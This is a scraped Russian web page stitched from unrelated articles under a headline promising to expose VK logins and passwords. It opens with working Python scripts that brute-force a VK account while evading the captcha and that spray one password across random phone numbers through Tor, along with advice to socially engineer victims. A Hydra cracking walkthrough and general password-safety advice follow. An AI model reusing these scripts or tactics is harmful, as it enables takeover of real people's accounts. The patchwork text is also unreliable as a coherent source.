Подбор паролей вк: Как узнать логин и пароль от ВК по ID бесплатно

Обход капчи при авторизации ВКонтакте / Habr

Не так давно начал учить Python и попробовал использовать VK API на Python. Поняв как это всё работает решил попробовать и использовал для этого Python модуль vk_api.

С помощью этого модуля можно легко авторизоваться в Вконтакте и так же просто пользоваться API:

import vk_api
vk_session = vk_api.VkApi('79100000000', 'passwordA')
vk_session.auth()

Авторизация на страницу А прошла успешно, но после нескольких попыток авторизации неверным паролем выскакивает ошибка. Это капча.

Я использовал вторую страницу(В) в Вконтакте для авторизации, но после этой авторизации снова ввел логин для страницы А и неверный пароль, что в результате капча не появилась.

Далее сделал попытку подбора паролей для страницы А и написал следующий код:

import vk_api, os
i = 0 # будем считывать пароли
auth_i = 0 # будем считывать круги
login_a = '79100000000' #логин к странице А
login_b = '79200000000' #логин к странице В
password_b = 'passwordB' #пароль к странице В
password_file = "password.  txt" # файл с паролями
# читаем файл с паролями построчно
with open('password_file.txt', 'r') as f:
    password = f.read().splitlines()
while len(password) > i:
    # на каждые 6 раз авторизуемся, что бы избавиться от капчи
    if auth_i == 6:
        vk_session = vk_api.VkApi(login_b, password_b)
        vk_session.auth()
        os.system("rm vk_config.v2.json")
        auth_i=0
    try:
        vk_sessions = vk_api.VkApi(login_a, password[i]) # делаем попытку авторизации
        vk_sessions.auth()
        print("[###]:  "+password[i]) # если Успех, то выводим пароль
    except:
        print(password[i]) # если ошибка, то идем дальше считывая пароли
    auth_i+=1
    i+=1

Пароли:

qwerty321 #1
an199910  #2
10an10199 #3
...
<u>
dxer19991 #53
</u>... #60

И в результате получил dxer19991 .

Таким способом можно перебрать ~60 паролей, а после выскакивает новая от Google.

Вроде не так страшно, но допустим у нас есть обычный юзер:

Павел Дуровский 1999.10.10 79200000000

Учитывая простоту человека, можно предположить, что его пароль состоит из выше перечисленных данных и составить такие пароли:

pasha1010
10101999pasha
...

И так составить примерно 60 паролей.

Если ни один пароль не совпал можно включить социальную инженерию и попросить юзера перезайти в свой аккаунт(или придумать другой способ, что бы юзер совершил это действие), а затем снова составить ~60 других паролей и снова начать подбирать их.

В результате нам удается подобрать ~120 паролей за 2 подхода, но можно и ещё если удастся попросить юзера переавторизоваться.

Кто сказал, что брутить можно только логин?

Из всего, что попробовал мне не понравились ограничения, по это этому решил подбирать логины по паролю и написал следующий код:

import vk_api, random, time, os
i=0
codes = [900, 902, 903, 904, 905, 906, 908, 909,
         950, 951, 953, 960, 961, 962, 963, 964,
         965, 966, 967, 968, 969, 980, 983, 986,
         901, 904, 910, 911, 912, 913, 914, 915,
         916, 917, 918, 919, 950, 978, 980, 981,
         982, 983, 984, 985, 987, 988, 989, 920,
         921, 922, 923, 924, 925, 926, 927, 928,
         929, 930, 931, 932, 933, 934, 936, 937,
         938, 939, 950, 951, 999, 901, 952, 958,
         977, 991, 992, 993, 994, 995, 996, 998] # операторы
password = "12345678" # пароль по которому будем искать
cod = "" #cod = "968"
while True:
    try:
        if cod == "":
            login = "7"+str(codes[random.
  randint(0, len(codes))])+str(random.randint(1000000, 9999999))
        else:
            login = "7"+cod+str(random.randint(1000000, 9999999))
    except:
        print("Error creating login")
    try:
        vk_session = vk_api.VkApi(login, password)
        vk_session.auth()
        print("[TRUE]>>> login: "+login+" : "+"Password: "+password)
        file = open("bd.log", "a+")
        file.write("login: "+login+" "+"Password: "+password+"\n")
        file.close()
        i=0
    except:
        if i == 10:
            # логин и пароль для сброса капчи
            vk_sessions = vk_api.VkApi('79200000000', "password") 
            vk_sessions.auth()
            print("reCaptcha")
            os.system("rm vk_config.v2.json")
            i=0
        else:
            print("=> "+login+" for "+password)
        i+=1
        time.sleep(0.2) # машину жалко

Ну а после я подключил Тор к консоли и запустил код.

Возможно и в первом варианте надо было подключить Тор к консоли. Но не факт, что получилось бы.

В итоге можно сказать, что пользователи с простыми и удобными паролями, могут быть в опасности.

Об этом решил сообщить в вк, но ответа всё ещё не получил.

Актуальные методы взлома паролей 2021

Содержание

• 1 Актуальные способы взлома паролей
  • 1.1 Взлом паролей на основе словаря
  • 1.2 Брутфорс (перебор пароля / грубая сила)
  • 1.3 Гибридная атака брутфорс
  • 1.4 Атаки по радужному таблицам
• 2 Взлом пароля с помощью Hydra в Kali Linux
• 3 Заключение

В этой статье мы рассмотрим актуальные методы взлома паролей, такие как: атака по словарю, взлом методом перебора (брутфорс) и взлом пароля с использованием радужных таблиц. Ну и как бонус, я покажу, как взломать пароль используя один из способов описанный в статье, с помощью мощного инструмента Hydra в Kali Linux.

Пароли защищены двумя способами: хешированием и шифрованием.

Шифрование — это преобразование простого текста в нечитаемую форму (зашифрованный текст). Расшифровать зашифрованный текст с помощью этой техники очень просто.

Хеширование использует уникальные случайные числа для шифрования обычного текста в нечитаемую форму. Злоумышленник может получить хэш пароля пользователя, но не всегда у него получится расшифровать его. Доступно множество методов «де-хеширования» пароля, но они не всегда эффективны.

Актуальные способы взлома паролей

Хакеры и пентестеры используют различные методы взлома пароля, такие как социальная инженерия, анализ сетей, клавиатурные шпионы, брутфорс и т. д. В этой статье рассмотрим атаки по словарю, перебор пароля, гибридные атаки и атаки с использованием радужной таблицы.

Взлом паролей на основе словаря

Атака по словарю — это метод подбора пароля с использованием часто используемых слов. Например, если человек увлекается автомобилями и везде упоминает автомобили в своем аккаунте в социальной сети, то подобрать пароль этого человека не составит труда. Как правило, пользователи придумывает пароли опираясь на два правила:

1. Хобби или близкие люди
2. Легко запоминаемый пароль

В этой атаке хакеры используют специально подобранный список слов, содержащий повседневные слова, которые может использовать жертва.

Такой список составляют на этапе сбора информации.

Брутфорс (перебор пароля / грубая сила)

Атака перебором подбирает все возможные популярные комбинации логин / пароль. Пользователи еще не разучились использовать простые распространенные пароли и поэтому этот способ считается довольно эффективным.

Длина и сложность пароля делает взлом более затруднительным. Например, перебор восьмизначного пароля займет намного больше времени, чем пятизначного.

Данный способа взлома паролей, часто используется для взлома сайтов.

Гибридная атака брутфорс

Гибридная атака представляет собой комбинацию брутфорс атаки и словаря на основе увлечений и имен близкий людей пользователя.

Например, пользователи часто добавляют набор цифр в конце своих учетных данных, таких как год окончания или год рождения (например, lena1992 или dima2013). Таким образом, хакеры используют атаку по словарю для генерации фраз, а затем проводят атаку методом перебора последних цифр.

Вместо того чтобы проверять каждый пароль, гибридная атака использует набор учетных данных и создает и пробует незначительные модификации фраз по всему списку, например изменение букв или цифр.

Атаки по радужному таблицам

Атаки с использованием радужных таблиц отличаются тем, что они взламывают не пароли, а хеш-функцию паролей. Радужная таблица — это предварительно вычисленная таблица, которая кэширует результат хеш-алгоритмов, обычно используемых для расшифровки хэшей учетных данных.

Эта атака также рассматривается как взлом пароля в автономном режиме. Поскольку хакеру не нужно взаимодействовать со страницей авторизации пользователя или системой. Как только хакер получает доступ к хешам паролей, переходит в автономный режим и проверяет хеши с помощью предварительно вычисленной хеш-таблицы.

Этот способ часто используется при взломе пароля WiFi-сетей и операционной системы.

Взлом пароля с помощью Hydra в Kali Linux

Для демонстрации взлома пароля я буду использовать инструмент Hydra, который по умолчанию предустановлен в Kali Linux. Для любителей Windows есть простой способ работы с Kali Linux — установить Kali Linux в Windows 10 под WSL.

Запустите Kali Linux —> Откройте терминал —> Запустите команду Nmap с IP-адресом жертвы (можно использовать виртуалку Metasploitable), чтобы проверить открытые порты.

Для атаки вы можете использовать свой собственный словарь или популярный словарь для перебора паролей «rockyou.txt», доступный в Kali Linux. Для демонстрации я использую файл «username.txt» для имен пользователей жертвы и файл «password.txt» для случайных паролей.

Запустите GUI Hydra —> Выберите IP-адрес жертвы (Single Target) —> Выберите целевой порт (в нашем случае это SSH 22) —> Установите флажок подробное описание и отображение попыток (Show Attemps).

 

Перейдите на вкладку Пароли (Passwords) —> Выберите текстовый файл с именами пользователей (Usernam List) и текстовый файл с паролями (Password List).

Перейдите на вкладку Настройка (Tuning) —> Измените количество задач на 4 и начните атаку.

Гидра взломала пароль:

Заключение

Атаки по словарю, грубая сила и атака по радужным таблицам — все это популярные способы взлома пароли.

Инструмент Hydra — один из самых популярных инструментов для взлома паролей. Он в арсенале каждого хакера и пентестера.

Еще по теме: Лучшие программы для взлома со смартфона

Как выбирать (и запоминать) безопасные пароли

Эта история обновлена. Первоначально он был опубликован 27 марта 2017 года.

Еще один день, еще одна серьезная утечка данных — и еще одна статья с советами по усилению паролей. Эти секретные фрагменты информации действуют как ключи ко всем нашим важным онлайн-аккаунтам, от социальных сетей до почтовых ящиков и банковских счетов.

Вот почему так важно выбирать надежные пароли и правильно ими управлять. Это может быть разница между сохранением вашей личности в безопасности и передачей вашей информации в руки хакеров. Ваш пароль — не единственная мера безопасности, о которой вам нужно подумать, но одна из самых важных.

К сожалению, многие из нас довольно плохо выбирают пароли. Мы склонны выбирать те, которые легко запомнить и, следовательно, легко угадать, и склонны использовать их снова и снова. Если вы хотите повысить безопасность своего личного пароля, читайте дальше.

Передовой опыт работы с паролями

Выбор пароля для ваших онлайн-аккаунтов ничем не отличается от выбора пароля для тайного общества: его должно быть трудно забыть для членов и невозможно угадать для тех, кто планирует вломиться.

Если вы используете «123456» или «пароль», вы подвергаете себя риску, потому что миллионы других людей также используют эти очевидные комбинации. Это первые варианты, которые пробует большинство хакеров, прямо перед «password1» и «passw0rd».

Также важно выбирать комбинации букв и цифр, которые трудно угадать из общедоступных данных о вас. Например, быстрое сканирование вашей страницы в Facebook может сообщить хакеру дату вашего рождения или даже дорогу, по которой вы живете. Таким образом, преобразование этих фрагментов информации в пароль не сделает его невозможным для угадывания.

[См.: Твиттер собирается сделать большой шаг к будущему без паролей]

Еще одна наилучшая практика — выбрать пароль длиной не менее 10 символов. Чем длиннее пароль, тем лучше; чем плотнее сочетание букв, цифр и спецсимволов, тем лучше; и чем нелепее, тем лучше. Подумайте о четырехзначном коде, используя только числа и ничего больше: существует 10 000 возможных комбинаций, но добавьте еще одну цифру, и вы получите 100 000. Добавьте буквы и специальные символы, удлините пароль до 10 символов и более, и вы увидите, как помогает каждая дополнительная буква.

Так как же выбрать эту мистическую комбинацию? Эксперт по безопасности Брюс Шнайер предлагает превратить в пароль случайное предложение (не известную цитату или фразу). Например: «Нам нравится получать электронные письма от бабушки, но она редко их пишет». — это уникальное предложение, которое может стать «Wlge-mfG,bsrw0». взяв первую букву каждого слова (кроме «e-mail», которое становится «e-m», и «o», которое становится «0»). В результате получается пароль со случайными буквами, цифрами, символами и большим количеством цифр, который легко вспомнить, вспомнив полное предложение.

Конечно, теперь, когда я написал этот потенциальный пароль в опубликованной статье, он больше не является безопасным, но вы можете легко проделать этот трюк самостоятельно со своим предложением. Вам также не нужно брать первую букву каждого слова. Вместо того, чтобы превращать «любовь» в «л», я мог бы сделать «<3». Некоторые другие примеры от Schneier включают:

• WIw7,mstmsritt… = Когда мне было семь лет, моя сестра бросила моего плюшевого кролика в унитаз.
• Вау… doestcst = Вау, этот диван ужасно пахнет.
• Ltime@go-inag~faaa! = Давным-давно в совсем недалекой галактике.

Если вы все еще не уверены в безопасности, многие веб-сервисы сообщат вам, насколько надежен ваш пароль, когда вы его создаете. Они также будут защищать от атак «грубой силы», когда несколько паролей перебираются в быстрой последовательности.

Выбор правильного пароля может быть сложным, но это стоит усилий. Keeper

Еще одна серьезная ошибка при вводе пароля — использование одного и того же пароля для нескольких учетных записей. Если использовать аналогию с тайным обществом, это означает, что хакер может получить доступ ко всем вашим клубам сразу, просто взломав тот, где безопасность самая слабая. Если вы используете другой пароль для своей основной учетной записи электронной почты, то не имеет большого значения, если старая учетная запись, которую вы использовали три года назад, будет взломана. Но если пароли одинаковые, у вас проблемы.

Один из способов помочь вам запомнить все пароли вашей учетной записи — использовать одну случайную или трудно угадываемую серию букв и цифр в нескольких службах, но каждый раз слегка меняя комбинацию. Опять же, это нужно сделать так, чтобы вы запомнили, но другие люди не смогли бы догадаться. Если ваш пароль Twitter «Wlge-mfG,bsrw0.Twitter», а ваш пароль Gmail — «Wlge-mfG,bsrw0.Gmail», вы не особенно защищены.

Так как же запомнить, какой пароль подходит к какой учетной записи? Мы определенно рекомендуем не записывать свои пароли где бы то ни было, потому что это все равно, что оставить главный ключ для всех ваших онлайн-идентификаций в одном месте. К счастью, есть более безопасные способы отслеживать все эти пароли и делать их как можно более надежными.

Управление паролями

Если вы сейчас думаете, что никогда не запомните все пароли, которые вам нужно держать в голове, не паникуйте — помощь всегда рядом. Ваш веб-браузер включает в себя несколько основных параметров управления паролями, чтобы снять нагрузку с вашего перегруженного мозга, и у вас также есть возможность перейти на автономный менеджер паролей.

Во-первых, рекомендуется добавить двухэтапную аутентификацию ко всем возможным учетным записям. Это дополнительный уровень защиты, который делает ваш пароль менее важным, поскольку его можно использовать только с дополнительным кодом (обычно отправляемым на ваш проверенный мобильный телефон). Это все равно, что вам нужен билет и пароль, чтобы попасть в ваш секретный клуб, и большинство онлайн-аккаунтов, от Google до Facebook, поддерживают это.

Большинство веб-браузеров, включая Firefox, включают менеджер паролей. David Nield

Большинство браузеров по умолчанию включают параметры управления паролями, поэтому вы сможете найти их в Google Chrome, Mozilla Firefox и Microsoft Edge. Возможно, вы уже сталкивались с ними через всплывающее окно с вопросом, хотите ли вы, чтобы ваш браузер запомнил пароль. Эти пароли обычно можно синхронизировать на разных компьютерах, что избавляет вас от необходимости каждый раз запоминать данные для входа.

[Связано: вам следует начать использовать менеджер паролей]

Эти функции достаточно безопасны для использования, если доступ к вашему браузеру защищен. В противном случае любой, кто загрузит ваш веб-браузер, сможет попасть в ваши учетные записи за несколько кликов. На практике это означает, что у вас есть собственная защищенная паролем учетная запись пользователя, настроенная в Windows и macOS, которая эффективно предотвращает доступ кого-либо еще к вашему кешу паролей.

Для еще более удобного хранения паролей установите специальную программу управления паролями. Эти приложения — и есть из чего выбрать — хранят ваши пароли на нескольких компьютерах и мобильных устройствах и обычно также помогают вам выбирать надежные пароли. В отличие от записанного списка паролей, все в менеджере паролей будет зашифровано и защищено одним мастер-паролем.

Большинство менеджеров можно использовать бесплатно, но премиум-функции доступны за определенную плату. Для еще большей защиты они обычно также работают с сервисами двухэтапной проверки. Многие менеджеры паролей также хранят для вас другую конфиденциальную информацию, включая коды Wi-Fi, номера кредитных карт и так далее.

Менеджеры паролей обрабатывают ваши пароли на нескольких устройствах. 1Password

Вам не нужно долго искать в Интернете обзоры и групповые тесты менеджеров паролей, но LastPass — один из крупнейших и наиболее уважаемых сервисов. Он позволяет вам управлять неограниченным количеством паролей на нескольких устройствах, а дополнительные функции (например, больше зарегистрированных мобильных устройств и приоритетная поддержка) доступны за 3 доллара в месяц.

Другим отточенным решением является 1Password, который платный, но предлагает бесплатную пробную версию. Вы платите 3 доллара в месяц за неограниченное хранение паролей на всех ваших устройствах для одного человека, а семейные планы доступны за 5 долларов в месяц. Мы также рекомендуем вам проверить Dashlane и Keeper, когда вы выбираете подходящий менеджер паролей для вас.

Как выбрать идеальный пароль

Выбор идеального пароля сводится к битве между двумя конкурирующими приоритетами: создание безопасных, длинных и уникальных паролей и создание паролей, которые вы можете запомнить. Вы можете подумать про себя, У меня уже больше паролей, чем мне нужно! Я придумывал пароли годами!  Но с ростом числа взломов паролей и появлением большего количества открытых паролей, связанных с именами пользователей, надежная стратегия паролей становится все более важной с каждым днем.

Мы начнем с основ: как лучше всего хранить пароли и как избежать использования популярных, легко угадываемых паролей. Далее мы перейдем к интересным вещам: стратегиям выбора сложных, запоминающихся паролей, у которых есть хорошие шансы выжить при взломе пароля, чтобы у вас было время его изменить.

Предыдущая защита паролей PCWorld включает:

• Как определить, что ваш пароль был украден
• Лучшие бесплатные менеджеры паролей
• Лучшие менеджеры паролей, бесплатные и платные
• Как создавать надежные пароли, научившись их взламывать
• Освоение менеджера паролей: 5 отличных советов

Как сохранить пароль

Зачем запоминать пароль, если его можно сохранить? Вы уже можете бесплатно хранить пароли в основных веб-браузерах и Microsoft Edge. Идти по этому пути легко и даже заманчиво, особенно когда браузер видит, что вы вводите пароли, и предлагает их сохранить.

Google

Будь то специальный менеджер паролей, такой как Dashlane, или менеджер паролей, хранящийся в вашем браузере, — в любом случае часто удобнее позволить сторонней службе управлять вашими учетными данными.

Мой коллега Брэд Чакос, с другой стороны, утверждает, что менеджер паролей лучше. Я признаю это: менеджеры паролей — более мощный инструмент — они хранят ваши пароли в зашифрованном хранилище, и лучшие менеджеры паролей также будут работать на вашем ПК и телефоне. Вот почему мы предупредили вас, когда LastPass изменил уровень бесплатного пользования, чтобы разрешить только один тип устройств.

Менеджерам паролей и браузерам по-прежнему нужен один мастер-пароль, который разблокирует хранящиеся в нем пароли. (Microsoft использует ваш пароль Windows для хранения паролей в Edge, в то время как Google использует пароль, который вы связали с Gmail.) Даже если у вас есть только один пароль, он должен быть хорошим.

Насколько уязвим мой пароль?

Вы будете поражены тем, как быстро можно взломать простой пароль… а также сколько месяцев и лет уходят на взлом более сложного. Взломы раскрывают эти пароли в хешированной форме; любой, у кого есть доступ, может попытаться угадать ваш пароль, используя мощность компьютера, чтобы попробовать миллиарды догадок в секунду.

Как показано на приведенной ниже диаграмме (разработанной профессиональной компанией по взлому паролей Terahash), вам потребуется не менее десяти символов в вашем пароле, чтобы сделать его безопасным, а чем длиннее, тем лучше.

Терахаш / Твиттер

Такие компании, как Terahash, могут объединить несколько сотен графических процессоров для создания мощных решений для взлома паролей, которые могут мгновенно взламывать короткие пароли. На этой диаграмме показано, как простое добавление еще нескольких символов к паролю может сделать время, необходимое для его взлома, почти невозможным, даже с несколькими графическими процессорами.

У вас есть защита. Если злоумышленник не ищет конкретно вас, массовая утечка пароля по-прежнему предлагает вам анонимность, поскольку вы являетесь лишь одной из многих потенциальных целей. (Однако, если пароль был связан с вашим именем пользователя ранее, вы гораздо более уязвимы.) 

Злоумышленник также должен угадать весь ваш пароль, что немаловажно. Хакеры могут использовать атаки по словарю, пробуя распространенные слова и известные пароли, которые ранее были взломаны. Они могут использовать маски, правила и процедурно сгенерированные «радужные таблицы», которые могут сделать взлом пароля еще проще.

Однако веб-сайты и службы (как правило) на вашей стороне. Попробуйте слишком много раз ввести неправильный пароль на своем банковском сайте — в конечном итоге вы будете заблокированы и вынуждены аутентифицироваться с еще большей информацией. Двухфакторная аутентификация (2FA) может помешать злоумышленнику, даже если он знает ваш пароль. Мы настоятельно рекомендуем использовать двухфакторную аутентификацию везде, где она доступна.

Четыре правила выбора более надежных паролей

Что еще вы можете сделать, чтобы защитить себя? Используйте эти правила, чтобы выбрать более безопасные пароли.

Правило 1: Пароли должны быть как можно длиннее

Если вы ничего не делаете, делайте пароли как можно длиннее. Как отмечалось выше, длина имеет значение: даже пароль, состоящий из знакомой фразы, такой как JackandJillwentupthehill , намного надежнее, чем bT6$g2 , просто потому, что первый длиннее.

Некоторые эксперты, с которыми мы разговаривали, говорят, что на этом можно остановиться. Однако мы по-прежнему рекомендуем делать пароль слегка сложным.

Каждый символ в пароле может быть буквой нижнего регистра, буквой верхнего регистра, цифрой или специальным символом, например  % . Использование только строчных букв предлагает 26 комбинаций на символ; добавление прописных букв, цифр и специального символа может увеличить это число до 96 комбинаций на символ. Поскольку взломщики паролей могут быть запрограммированы на угадывание только строчных букв, добавление даже одной цифры и специального символа может их сбить. Вот почему банки применяют такие правила, как выбор паролей, состоящих из букв верхнего и нижнего регистра, цифр и специальных символов, что делает их определенной минимальной длины и позволяет вам выбирать еще более длинные пароли для менеджеров паролей.

Правило 2. Создайте уникальные пароли для каждого сайта или службы

Если один из ваших паролей будет взломан, и совпадают с вашим именем пользователя, хакеры могут использовать эту информацию, чтобы попробовать использовать то же имя пользователя и пароль в других службах. Вот почему важно использовать уникальные пароли, чтобы ущерб был ограничен одной службой.

Менеджер паролей автоматически сгенерирует уникальные пароли для всех сайтов и сервисов, которыми вы пользуетесь, решив эту проблему за вас.

Правило 3: пароль бесполезен, если его невозможно вспомнить

Конечно, вы можете запросить сброс пароля, но с действительно важными паролями вы рискуете пройти длительный процесс подтверждения своей личности. Вам нужен либо запоминающийся пароль, либо тот, который вы знаете, где найти. (Подробнее об этом позже.)

Что хорошо в использовании менеджера паролей, так это то, что вам нужен только один длинный пароль . Если вы управляете несколькими паролями, вам нужно адаптировать их к длине пароля и условиям, которые налагает каждый сайт, а это означает, что нужно помнить больше паролей.

К сожалению: есть четвертое правило:

Правило 4: Пароль безупречен только до тех пор, пока он не

Скомпрометированный пароль для вас мертв. Как только вы узнаете о взломе, смените пароль как можно скорее.

Даже если вы не были взломаны, если пароль не обновлялся в течение нескольких лет, это может дать злоумышленнику возможность проникнуть в вашу цифровую жизнь. Не позволяйте им! Чаще обновляйте пароли, чтобы быть на шаг впереди.

Шесть стратегий создания более безопасных паролей

Теперь, когда вы знаете, что требуется для безопасных паролей, давайте обсудим некоторые возможные стратегии их создания. Мы начнем с базовой стратегии паролей и будем усложнять ее по мере продвижения.

Стратегия 1: фраза-пароль

Для многих отличная стратегия для запуска пароля  – это фраза-пароль: некоторая комбинация слов или цифр, длинная и запоминающаяся. Это может быть любимая поговорка или цитата, или набор слов, которые что-то для вас значат, например, пять ваших лучших вкусов мороженого.

Дайсвободу,простисмерть!

Парольные фразы, как правило, включают как заглавные буквы, так и специальные символы. Те, которые включают числа, добавляют еще больше сложности.

Wrigley1060WAAddisonSt.

Одним из аргументов в пользу того, чтобы не использовать общую фразу-пароль саму по себе , является то, что вы действительно не знаете, какие хитрости есть у взломщика. В словарной атаке можно использовать очень популярные фразы, например отрывки из Библии.

Стратегия 2: Иностранные языки

Если злоумышленник использует словарь, он может сначала попробовать английские фразы. Смешивание и сопоставление языков не повредит и может добавить сложности: Qu’est-cequec’estBigMac,otaku?  дает вам представление о возможностях.

Стратегия 3: Поэзия или история

Если цель состоит в том, чтобы легко запомнить пароль, поэзия станет отличным источником вдохновения. Например, отрывки из стихотворения Льюиса Кэрролла «Бармаглот» или книги доктора Сьюза содержат бессмысленные слова. Ваш пароль может состоять из одной или двух строк любого стихотворения с косой чертой между строками, чтобы добавить сложности со специальными символами. Бонусные баллы, если вы вытащите свои копии  Кентерберийские рассказы или Беовульф , чтобы добавить среднеанглийскую или староанглийскую сложность вашей парольной фразе.

Марк Хачман / IDG

Парольная фраза, бессмысленное слово, некоторые заглавные буквы — детские книги, такие как « О, места, куда вы отправитесь » доктора Сьюза, могут быть хорошими источниками паролей-паролей.

Стратегия 4. Не используйте ничего, что можно найти на Facebook

Одной из наиболее интересных концептуальных статей о взломе паролей, которые я читал, была статья Дина Вана из Пекинского университета и других, в которой рассматривалось, как простое знание некоторых базовых факты о человеке — имя, пол, день рождения и номер телефона — резко увеличивали шансы на то, что их алгоритмы смогут угадать пароль пользователя, до мелодии 9. 0003 73-процентная вероятность успеха против реальных взломов. (В этом тарифе использовался другой, просочившийся пароль на другом сайте и некоторая личная информация.)

Ответ? Предположим, что то, что вы говорите в Интернете на Facebook, Twitter и Instagram, будет использовано против вас.

Значит ли это, что вы не можете использовать свою личную жизнь в качестве пароля? Конечно нет. Просто используйте информацию, которую вы знаете, а другие нет. Не используйте имена членов вашей семьи или домашних животных, но подойдут имена детей или домашних животных вашего соседа.

Стратегия 5: Смешайте это

Исследование взлома паролей, проведенное в 2013 году Ars Technica , показало, что «обычно заглавные буквы идут в начале, строчные буквы — в середине, а символы и цифры — в конце». », включая «суффиксы» из нескольких случайных букв и цифр, прикрепленных к более распространенным словам.

Так перепутай. 2bornnot2b, то есть вопрос не включает заглавную букву, но немного обыгрывает знаменитую строчку Шекспира. Просто помните конечную цель: длинный пароль — самый надежный пароль.

У технолога безопасности Брюса Шнайера есть аналогичная, даже более сложная схема, где он берет предложение и реферирует его. «Кто лидер группы, созданной для вас и меня?» становится «W’sTLotbW’smade4u&me?» «Если вы хотите, чтобы ваш пароль было трудно угадать, вам следует выбрать то, что этот процесс пропустит», — написал Шнайер.

Некоторым может быть известна более старая стратегия «l33t-speak», когда цифры могут заменять буквы. Однако взломщики паролей могут быть запрограммированы на это, так что это уже не обязательно безопасная стратегия.

Стратегия 6: Весь мир — ваш пароль

Подбор осмысленных паролей может быть таким же глупым, как и фраза, которую ваш P.E. учитель приветствовал вас или так же повторялся, как знак, который вы видите каждый божий день, объявляя о съезде с автострады к вашему дому.

Марк Хачман / IDG

Используете ли вы обложки для вдохновения или сам текст, научная фантастика и фэнтези могут подсказать запоминающиеся слова, которые могут стать отличными паролями.

Выберите название с книжной полки, чем незнакомее, тем лучше. Кому придет в голову кулинарная книга под названием  Двенадцать месяцев монастырских супов ?

Вы даже можете использовать книгу в качестве источника своего пароля, а затем хранить напоминание о пароле в бумажнике или кошельке. Если я напишу «Страница 69, строка 2» на клочке бумаги и суну его в свой кошелек, злоумышленнику нужно будет украсть мой кошелек; знать, что означает сообщение; знать, какой документ или книгу я имею в виду; иметь доступ к копии, идентичной моей; и знать, какие слова я имею в виду.

Нужно ли записывать свои пароли?

Запись ваших паролей звучит как самая глупая вещь, которую кто-либо когда-либо мог сделать. Действительно ли это глупо, зависит от ситуации.

Записывать свои пароли от руки в общей квартире с соседями по комнате, которым вы не обязательно доверяете, кажется очень плохой идеей. Точно так же никогда не следует оставлять наклейку с вашим паролем Windows на компьютере, который вы используете в офисе.